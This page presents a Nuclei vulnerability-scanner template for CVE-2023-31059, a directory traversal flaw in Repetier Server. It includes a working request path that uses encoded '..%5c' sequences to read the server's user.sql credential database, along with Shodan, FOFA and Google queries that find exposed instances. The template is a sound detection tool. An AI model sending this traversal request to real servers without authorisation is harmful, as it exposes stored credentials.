Repetier Server - Directory Traversal
ID: CVE-2023-31059
Severity: high
Author: parthmalhotra,pdresearch
Tags: cve2023,cve,repetier,lfi,repetier-server
Description
Section titled “Description”Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-31059
info: name: Repetier Server - Directory Traversal author: parthmalhotra,pdresearch severity: high description: | Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. impact: | An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server. reference: - https://cybir.com/2023/cve/poc-repetier-server-140/ - https://www.repetier-server.com/download-repetier-server/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 epss-score: 0.00878 epss-percentile: 0.8245 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: repetier-server product: repetier-server shodan-query: - title:"Repetier-Server" - http.title:"repetier-server" fofa-query: - title="Repetier-Server" - title="repetier-server" google-query: intitle:"repetier-server" tags: cve2023,cve,repetier,lfi,repetier-server
http: - method: GET path: - "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
matchers-condition: and matchers: - type: binary part: body binary: - 53514C69746520666F726D6174203300
- type: status status: - 200# digest: 4a0a00473045022100b294f9e8bb473a0f757f879a0c3b62885f0e604ca161845e9f761b29782621b802203025c1851193dc5fd528b8623a701d061ca7adb84bfcadd2081f7183ab5a43e9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-31059.yaml"